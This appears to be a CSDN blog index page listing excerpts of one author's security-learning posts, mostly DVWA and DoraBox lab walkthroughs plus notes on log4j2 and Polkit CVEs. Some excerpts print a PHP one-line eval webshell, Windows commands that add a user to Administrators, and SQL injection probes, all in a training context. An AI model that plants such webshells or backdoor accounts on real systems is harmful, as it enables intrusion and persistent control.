![](https://img-blog.csdnimg.cn/20201014180756930.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
安全
文章平均质量分 65
kb2414
这个作者很懒,什么都没留下…
展开
-
PHP一句话木马免杀学习
PHP一句话木马免杀学习简单了解php一句话木马原理<?php @eval($_POST['shell']);?>首先存在一个名为shell的变量,shell的取值为HTTP的POST方式。Web服务器对shell取值以后,然后通过eval()函数执行shell里面的内容。将以上代码写入webshell.php文件中然后放在站点目录下通过浏览器访问,以POST方式传入shell=phpinfo();一句话木马的变形常用变形函数convert_uudecode() #解码一个原创 2022-05-11 15:48:13 · 3094 阅读 · 1 评论 -
CentOS7简单安装jdk环境
1:卸载系统自带的OpenJDK以及相关的java文件在命令窗口键入:java -version可以看到系统自带的OpenJDK版本信息。2:在命令窗口键入:rpm -qa | grep java3.删除所以自带的版本。yum remove java-1.*删除后再查看rpm -qa | grep java剩下的三个文件不用进行删4.下载并上传jdkjdk下载地址:http://www.oracle.com/technetwork/java/javase/downl原创 2022-04-03 19:12:31 · 1263 阅读 · 0 评论 -
Linux Polkit权限提升漏洞(CVE-2021-4034)
Pkexec介绍:Pkexec是类似sudo-like的权限管理软件,它的作用为允许授权用户以其它用户的身份去执行程序,如果未指定用户名,则程序将以超级管理员(root)的身份执行漏洞描述Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。漏洞细节:对pkexec的工作流程进行分析:在源码原创 2022-01-27 16:06:09 · 1118 阅读 · 0 评论 -
文件包含漏洞学习记录
文件包含漏洞文件包含函数的参数没有经过过滤或者严格的定义,并且参数可以被用户控制,这样就可能包含非预期文件。如果文件中存在恶意代码,无论文件是什么类型,文件内的恶意代码都会被解析并执行。文件包含漏洞肯能会造成服务器网页被篡改、网站被挂马、服务器被远程控制、被安装后门等危害。常见的文件包含函数:1.include() 包含并运行制定文件。在出错时产生警告(E_WARNING),基本会继续运行。2.include_once() 在脚本执行期间包含并运行制定文件。与include区别:检查是否被包含过,原创 2022-01-23 17:24:22 · 240 阅读 · 0 评论 -
windows渗透常用命令
net 的常用用法查看共享连接net use增加远程共享net use host /u:user pass查看域中当前的主机列表net view /domain查看当前域中的用户net user /domain增加一个本地用户net user user pass /add将新增的用户加到本地管理员组net localgroup "Administrators" user /add查看域中的密码策略net accounts /domain查看本地组net loca原创 2021-12-17 20:27:05 · 768 阅读 · 0 评论 -
vulfocus Apache log4j2-RCE 漏洞复现(CVE-2021-44228)
根据提示,漏洞存在于http://xxxxx/hello的payload参数中,并以post的方式传参,因此我们可以利用hackerbar进行漏洞验证创建靶场后是这样一个页面。使用payload验证,发现可以触发dnslog,可以确认可以利用证明存在JNDI注入漏洞。在这里我们需要用到JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar来生成payload,建立1389和8080端口的服务。用于远程命令执行使靶机来访问我准备好的EXP从而进行更安全的被动连接,原创 2021-12-15 20:08:52 · 5009 阅读 · 0 评论 -
DoraBox靶场记录数据库Error: Unknown database ‘pentest‘错误
具体错误显示如下Warning: mysqli::__construct(): (HY000/1049): Unknown database 'pentest' in C:\phpstudy_pro\WWW\DoraBox-master\class\function.class.php on line 38Warning: mysqli::set_charset(): Couldn't fetch mysqli in C:\phpstudy_pro\WWW\DoraBox-master\class\f原创 2021-10-12 23:10:18 · 192 阅读 · 0 评论 -
DoraBox——SQL注入篇2--字符型
DoraBox ——掌握常见漏洞攻防SQL注入篇2–字符型1.判断是否存在注入,注入是字符型还是数字型(其实我们已经知道注入是数字类型,但为了更好的学习,按步骤进行学习)当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。接着我们分别输入1 and 1=11 and 1=2以上均不能查到任何表输入字符类型1' and '1'='11' and '1'='2均不能查到任何表输入以下字符类型1'原创 2021-09-18 17:06:22 · 243 阅读 · 0 评论 -
DoraBox-SQL注入篇1–数字型
DoraBox - 掌握常见漏洞攻防SQL注入篇1–数字型1.判断数据库有几个输入1查询输入2查询输入3查询发现再也没有数据库查询出来,也就代表着数据库只有两个2.判断是否存在注入,注入是字符型还是数字型(其实我们已经知道注入是数字类型,但为了更好的学习,按步骤进行学习)当输入的参数为字符串时,称为字符型。字符型和数字型最大的一个区别在于,数字型不需要单引号来闭合,而字符串一般需要通过单引号来闭合的。接着我们分别输入1 and 1=11 and 1=2输入字符类型时可以知原创 2021-09-18 17:02:12 · 1165 阅读 · 0 评论 -
DVWA——Insecure CAPTCHA(不安全验证码)
DVWA——Insecure CAPTCHA(不安全验证码)验证码最大的作用就是防止攻击者使用工具或者软件自动调用系统功能就如Captcha的全称所示,他就是用来区分人类和计算机的一种图灵测试,这种做法可以很有效的防止恶意软件、机器人大量调用系统功能:比如注册、登录功能。我们前面讲到的Brute Force字典式暴力破解,就必须要使用工具大量尝试登录。如果这个时候系统有个严密的验证码机制,此类攻击就无计可施了。LOW服务器端核心代码:<?php // 步骤1if( isset( $_原创 2021-05-13 17:44:30 · 468 阅读 · 0 评论 -
DVWA File Upload(文件上传)
Low源代码:<?php if( isset( $_POST[ 'Upload' ] ) ) { $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/"; //设置上传目录 $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] ); //上传目录加上‘uploaded’表单参数所提交的文件名 // Can we move原创 2021-05-11 19:34:44 · 155 阅读 · 1 评论 -
DVWA Upload(菜刀连接文件上传出现: HTTP/1.1 200 OK问题)
测试环境:虚拟机搭建DVWA,php7.3.4连接工具:中国菜刀安全级别:LOW上传一句话木马上传成功后用中国菜刀连接发生以下问题解决问题:pjp版本过高将php版本降低为php5.0即可原创 2021-05-10 22:29:33 · 3140 阅读 · 2 评论 -
DVWA File Inclusion(文件包含内容)
lowlow等级,对文件包含行为毫无设防。<?php // The page we wish to display $file = $_GET[ 'page' ]; ?> 根据代码可以得知:1.URL参数输入,没有经过任何的过滤和检查,原封不动进行文件包含,并将结果返回。2.如果是php文件将导致任意命令执行,如果不是php文件将导致任意文件读取。本地文件包含:在D盘建一个记事本,内容随便打可以看到成功输出1.txt文件内容,这里需要提一下的是无论文件后缀名是什么,只原创 2021-05-09 22:33:21 · 145 阅读 · 0 评论 -
DVWA Command Injection(命令注入)
Low源代码:<?phpif( isset( $_POST[ 'Submit' ] ) ) { // Get input $target = $_REQUEST[ 'ip' ]; // Determine OS and execute the ping command. if( stristr( php_uname( 's' ), 'Windows NT' ) ) { // Windows $cmd = shell_exec( '原创 2021-05-09 19:32:45 · 93 阅读 · 0 评论 -
DVWA Brute Force(暴力破解)
low源代码: <?phpif( isset( $_GET[ 'Login' ] ) ) { // Get username $user = $_GET[ 'username' ]; // Get password $pass = $_GET[ 'password' ]; $pass = md5( $pass ); // Check the database $query = "SELECT * FROM `users` WHERE原创 2021-05-09 16:46:25 · 179 阅读 · 0 评论